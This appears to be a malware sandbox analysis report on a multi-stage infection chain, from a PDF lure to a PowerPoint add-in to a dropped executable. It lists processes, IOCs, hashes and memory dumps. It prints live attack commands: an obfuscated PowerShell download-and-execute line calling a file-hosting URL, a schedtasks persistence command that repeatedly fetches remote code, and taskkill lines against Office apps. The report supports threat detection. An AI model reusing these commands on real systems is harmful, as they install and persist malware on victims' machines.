    taskmgr.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1708taskmgr.exe
    Token: SeDebugPrivilege1936taskkill.exe
    Token: SeDebugPrivilege1916taskkill.exe
    Token: SeDebugPrivilege1356taskkill.exe
    Token: SeDebugPrivilege1932powershell.exe
  • Suspicious use of FindShellTrayWindow
    iexplore.exetaskmgr.exe

    Reported IOCs

    pidprocess
    1076iexplore.exe
    1076iexplore.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
  • Suspicious use of SendNotifyMessage
    taskmgr.exe

    Reported IOCs

    pidprocess
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
  • Suspicious use of SetWindowsHookEx
    AcroRd32.exeiexplore.exeIEXPLORE.EXE

    Reported IOCs

    pidprocess
    1100AcroRd32.exe
    1100AcroRd32.exe
    1100AcroRd32.exe
    1100AcroRd32.exe
    1076iexplore.exe
    1076iexplore.exe
    1732IEXPLORE.EXE
    1732IEXPLORE.EXE
  • Suspicious use of WriteProcessMemory
    AcroRd32.exeiexplore.exePOWERPNT.EXEddond.com

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1100 wrote to memory of 10761100AcroRd32.exeiexplore.exe
    PID 1100 wrote to memory of 10761100AcroRd32.exeiexplore.exe
    PID 1100 wrote to memory of 10761100AcroRd32.exeiexplore.exe
    PID 1100 wrote to memory of 10761100AcroRd32.exeiexplore.exe
    PID 1076 wrote to memory of 17321076iexplore.exeIEXPLORE.EXE
    PID 1076 wrote to memory of 17321076iexplore.exeIEXPLORE.EXE
    PID 1076 wrote to memory of 17321076iexplore.exeIEXPLORE.EXE
    PID 1076 wrote to memory of 17321076iexplore.exeIEXPLORE.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 1076 wrote to memory of 8241076iexplore.exePOWERPNT.EXE
    PID 824 wrote to memory of 288824POWERPNT.EXEsplwow64.exe
    PID 824 wrote to memory of 288824POWERPNT.EXEsplwow64.exe
    PID 824 wrote to memory of 288824POWERPNT.EXEsplwow64.exe
    PID 824 wrote to memory of 288824POWERPNT.EXEsplwow64.exe
    PID 824 wrote to memory of 1288824POWERPNT.EXEddond.com
    PID 824 wrote to memory of 1288824POWERPNT.EXEddond.com
    PID 824 wrote to memory of 1288824POWERPNT.EXEddond.com
    PID 824 wrote to memory of 1288824POWERPNT.EXEddond.com
    PID 1288 wrote to memory of 19321288ddond.compowershell.exe
    PID 1288 wrote to memory of 19321288ddond.compowershell.exe
    PID 1288 wrote to memory of 19321288ddond.compowershell.exe
    PID 1288 wrote to memory of 19321288ddond.compowershell.exe
    PID 1288 wrote to memory of 6161288ddond.comschtasks.exe
    PID 1288 wrote to memory of 6161288ddond.comschtasks.exe
    PID 1288 wrote to memory of 6161288ddond.comschtasks.exe
    PID 1288 wrote to memory of 6161288ddond.comschtasks.exe
    PID 1288 wrote to memory of 13561288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 13561288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 13561288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 13561288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 19361288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 19361288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 19361288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 19361288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 19161288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 19161288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 19161288ddond.comtaskkill.exe
    PID 1288 wrote to memory of 19161288ddond.comtaskkill.exe
Processes 12
  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\order 17052022.pdf"
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file
      Modifies Internet Explorer Phishing Filter
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1076 CREDAT:275457 /prefetch:2
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        PID:1732
      • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0O8D7KIM\14.ppam"
        Loads dropped DLL
        Modifies Internet Explorer settings
        Modifies registry class
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of WriteProcessMemory
        PID:824
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          PID:288
        • C:\ProgramData\ddond.com
          C:\\ProgramData\\ddond.com https://taxfile.mediafire.com/file/v9m1dw47xgtetw9/14.htm/file
          Executes dropped EXE
          Modifies Internet Explorer settings
          Modifies system certificate store
          Suspicious use of WriteProcessMemory
          PID:1288
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file'))));Invoke-Expression $MMMMMMM
            Blocklisted process makes network request
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            PID:1932
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 82 /tn calendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/8pmejv253qhljtn/14.htm/file"""
            Creates scheduled task(s)
            PID:616
          • C:\Windows\SysWOW64\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
            Kills process with taskkill
            Suspicious use of AdjustPrivilegeToken
            PID:1356
          • C:\Windows\SysWOW64\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
            Kills process with taskkill
            Suspicious use of AdjustPrivilegeToken
            PID:1936
          • C:\Windows\SysWOW64\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
            Kills process with taskkill
            Suspicious use of AdjustPrivilegeToken
            PID:1916
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    Suspicious behavior: EnumeratesProcesses
    Suspicious behavior: GetForegroundWindowSpam
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    PID:1708
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Discovery
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads

                    • C:\ProgramData\ddond.com

                      MD5

                      abdfc692d9fe43e2ba8fe6cb5a8cb95a

                      SHA1

                      d4f0397f83083e1c6fb0894187cc72aebcf2f34f

                      SHA256

                      949485ba939953642714ae6831d7dcb261691cac7cbb8c1a9220333801f60820

                      SHA512

                      c786bfb6a2316e43cb89901fae103157ec6b65117c292dc7570dd4685891b5afbb72064789b74bf55fe012c5936ed6468876e4d2cccdeff71b4abb2d76ff395f

                      Download Submit

                    • C:\ProgramData\ddond.com

                      MD5

                      abdfc692d9fe43e2ba8fe6cb5a8cb95a

                      SHA1

                      d4f0397f83083e1c6fb0894187cc72aebcf2f34f

                      SHA256

                      949485ba939953642714ae6831d7dcb261691cac7cbb8c1a9220333801f60820

                      SHA512

                      c786bfb6a2316e43cb89901fae103157ec6b65117c292dc7570dd4685891b5afbb72064789b74bf55fe012c5936ed6468876e4d2cccdeff71b4abb2d76ff395f

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B

                      MD5

                      3cf20b6b98063387ba507e194b74843e

                      SHA1

                      8cd2595ca2b86ef38e4933a8f04dceea8330d831

                      SHA256

                      b99c9f41fdae863d1f3d1d7606368acebebacd569ed3bde9e7edb0e1ec60c40d

                      SHA512

                      a070b25a7e312ff598f10e701fbd5db2608f220b166220c93a23d98cc4902b584e3d02751267eff05fbf5123138646c1b07ac4a42ded4cc3ed85711ec8a5b204

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\72BA427A91F50409B9EAC87F2B59B951_7113AA81F59D5AD048438D6378810119

                      MD5

                      135244d85a7513f8def7aa513137da29

                      SHA1

                      b67b5c9bad7e062dd7d25bed38e882ee527b1bc0

                      SHA256

                      f8b69146737db62aa94b02ea7b3124bd8ae3076cc46602f577e81af6b5f0ee11

                      SHA512

                      c4d6e0e5b861e6ecaaa1e2f328a65a7adda2ecdc873e9ae2887470445e5672b20024baffc6c34ff6e629807b01f22ef95ab1bb9125f004f3abdc0961d69f14dd

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                      MD5

                      b9f21d8db36e88831e5352bb82c438b3

                      SHA1

                      4a3c330954f9f65a2f5fd7e55800e46ce228a3e2

                      SHA256

                      998e0209690a48ed33b79af30fc13851e3e3416bed97e3679b6030c10cab361e

                      SHA512

                      d4a2ac7c14227fbaf8b532398fb69053f0a0d913273f6917027c8cadbba80113fdbec20c2a7eb31b7bb57c99f9fdeccf8576be5f39346d8b564fc72fb1699476

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                      MD5

                      b1c4234d2346ca5a2267de9f0bab4b81

                      SHA1

                      d6d10976b258ee86430063fdfb1838bb73838aeb

                      SHA256

                      e75d5e79323e42e337cf188a296db211f5d7dd488d03adf4b1be7836f997e3ed

                      SHA512

                      8b1d4c34ad847b73d060cb35dba350032be0a8cd82637a5c52805c078ea986ea44446040f588fb4edda4a233e424bdb6dc3ba016b7647936ec4ef4f971ff1e17

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                      MD5

                      a266bb7dcc38a562631361bbf61dd11b

                      SHA1

                      3b1efd3a66ea28b16697394703a72ca340a05bd5

                      SHA256

                      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                      SHA512

                      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B

                      MD5

                      3df3240355cb4ce678355a0ffae63363

                      SHA1

                      86f914815e50ddea52cc863f5dbf144fa1d63583

                      SHA256

                      710ab48ee7e0573fa4aba48942958b170d7a338e4f8bdb93959026a96314930d

                      SHA512

                      59f38d4a86a63e33423b3e772687d2914ab96e67665baac205d1cb2407b462efc9fccd9bd1eb654c274fe3c196d82845ce7daf3f04698162562d46e34380c19e

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\72BA427A91F50409B9EAC87F2B59B951_7113AA81F59D5AD048438D6378810119

                      MD5

                      75f6b23d475f07e51eb733f315ceae4d

                      SHA1

                      60252a04ee5e709b907705e85d227f772accc3d8

                      SHA256

                      95193515514c8fb2f49591c2a7eed4cd30ecf6ed897d037919e5db086b784146

                      SHA512

                      ce3d635ccaa4fc74ec0190c038511faafebb0dbbb1beff423c8efceb51fc4fca90bb3aca791c95f26c91183d9f42931ea195ac1d3a6cdd51718f79b67f32bd2b

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                      MD5

                      922ac55634f52d8090bfe34c6232039a

                      SHA1

                      572f2ad5474555786803a99d06689a06e9ea16d1

                      SHA256

                      82e080a861ae4859cbce544160689eac96f66b138557bc302bea3845885af14d

                      SHA512

                      d8fc6e4ac8da5e35947225ec150282cd5a47d5dc7154edfd266a913ab66badafdf8e503f9e052bb0ce8a8df468e9456e1938201d920246fb03d75c1cbb22b1ca

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                      MD5

                      659c5d670cea9af779ba851f314a10f9

                      SHA1

                      b69b6ffebc9aabe0128cb111df0a733b2204ea10

                      SHA256

                      0aab40d27ce0d134ee07ee89282a70f6d7b29f28cf9810a4e410c969750fe7bc

                      SHA512

                      2f4cb9e137bd3674a8afd746f1ffe8f9c008ea82b29979b8b6920adce917da87fbb6254ae94bb9f30d1affb13b407f436929b960fc267dbfdc64350c3f54256e

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                      MD5

                      a09fdf3d11dc1839e284e39a86b053e4

                      SHA1

                      761b9af6540477769337176d1f3749a0ff416211

                      SHA256

                      8b1027e17644b600b89d741301a2a417d02b0739eb252a0a1690e89c41d658c3

                      SHA512

                      f995188ef86953ac847ba917fad2ca5ab995b7217715de8ae13b7ae79d2f1101a30e84bf3d3e0cf7903445e8f5c5e4bdfecff7160b193f078ea08596fd07d933

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0O8D7KIM\14.ppam.18hf937.partial

                      MD5

                      66367046957810309248fcec536d7ccb

                      SHA1

                      5a118ce3f251140e852927503a3743442c68ff63

                      SHA256

                      26c3bd6b866dd452546949e169dfd0934cf53681fe53d63efa2a16db39cf131b

                      SHA512

                      1698fc41e4fe3bfd61841e9ec50a2461583d58cc5fafb00fb3c6a31460b0b866a7c96762da22de840f2081fb8524808e0177697860582aed6b33365a62f1fd08

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\9A9RUEXR.txt

                      MD5

                      493fefb20f800e94b28df11ed3ae4325

                      SHA1

                      0fdd499347849296b4bd9160815ad76a35723187

                      SHA256

                      dc19103b9cebcab997fab6a7c4fff8ee1779ab98078965ed40f1822ddc6ca173

                      SHA512

                      474ce68165dd971731349d1bcf1cd8657dbdf2d7fd89182c8b174b639215abd486da91167c7d3778e3e59f2d1452c8b9e502acf3b2c93f3d9032baaa8a26923e

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\TF0BWJIV.txt

                      MD5

                      2fe2e5d80b48fbd7c3827de2c88f3460

                      SHA1

                      39c6cf96ab9843934f97f6994ed1a667f0e9c6f7

                      SHA256

                      b931f42e021526b9eee3057b3a47988f127bd84694a2aa33879ef51e8fcd039e

                      SHA512

                      b13884d752ff9874b1e07f60baae0893d4256656933da7e8be62b4a94e2eb71b5c5971ca99de1a4bbc61ce410941288572becd3d4c13509eeb470db1f45711bc

                      Download Submit

                    • \ProgramData\ddond.com

                      MD5

                      abdfc692d9fe43e2ba8fe6cb5a8cb95a

                      SHA1

                      d4f0397f83083e1c6fb0894187cc72aebcf2f34f

                      SHA256

                      949485ba939953642714ae6831d7dcb261691cac7cbb8c1a9220333801f60820

                      SHA512

                      c786bfb6a2316e43cb89901fae103157ec6b65117c292dc7570dd4685891b5afbb72064789b74bf55fe012c5936ed6468876e4d2cccdeff71b4abb2d76ff395f

                      Download Submit

                    • \ProgramData\ddond.com

                      MD5

                      abdfc692d9fe43e2ba8fe6cb5a8cb95a

                      SHA1

                      d4f0397f83083e1c6fb0894187cc72aebcf2f34f

                      SHA256

                      949485ba939953642714ae6831d7dcb261691cac7cbb8c1a9220333801f60820

                      SHA512

                      c786bfb6a2316e43cb89901fae103157ec6b65117c292dc7570dd4685891b5afbb72064789b74bf55fe012c5936ed6468876e4d2cccdeff71b4abb2d76ff395f

                      Download Submit

                    • memory/288-60-0x0000000000000000-mapping.dmp

                      Download

                    • memory/288-62-0x000007FEFB5D1000-0x000007FEFB5D3000-memory.dmp

                      Download

                    • memory/616-86-0x0000000000000000-mapping.dmp

                      Download

                    • memory/824-69-0x000000000050C000-0x0000000000529000-memory.dmp

                      Download

                    • memory/824-68-0x000000000050C000-0x0000000000529000-memory.dmp

                      Download

                    • memory/824-63-0x000000006C33D000-0x000000006C348000-memory.dmp

                      Download

                    • memory/824-59-0x000000005FFF0000-0x0000000060000000-memory.dmp

                      Download

                    • memory/824-58-0x000000006B351000-0x000000006B353000-memory.dmp

                      Download

                    • memory/824-57-0x000000006DAA1000-0x000000006DAA5000-memory.dmp

                      Download

                    • memory/824-56-0x0000000000000000-mapping.dmp

                      Download

                    • memory/824-84-0x000000005FFF0000-0x0000000060000000-memory.dmp

                      Download

                    • memory/1100-54-0x0000000074B51000-0x0000000074B53000-memory.dmp

                      Download

                    • memory/1288-72-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1356-87-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1916-89-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1932-85-0x0000000000000000-mapping.dmp

                      Download

                    • memory/1932-91-0x0000000072E40000-0x00000000733EB000-memory.dmp

                      Download

                    • memory/1936-88-0x0000000000000000-mapping.dmp

                      Download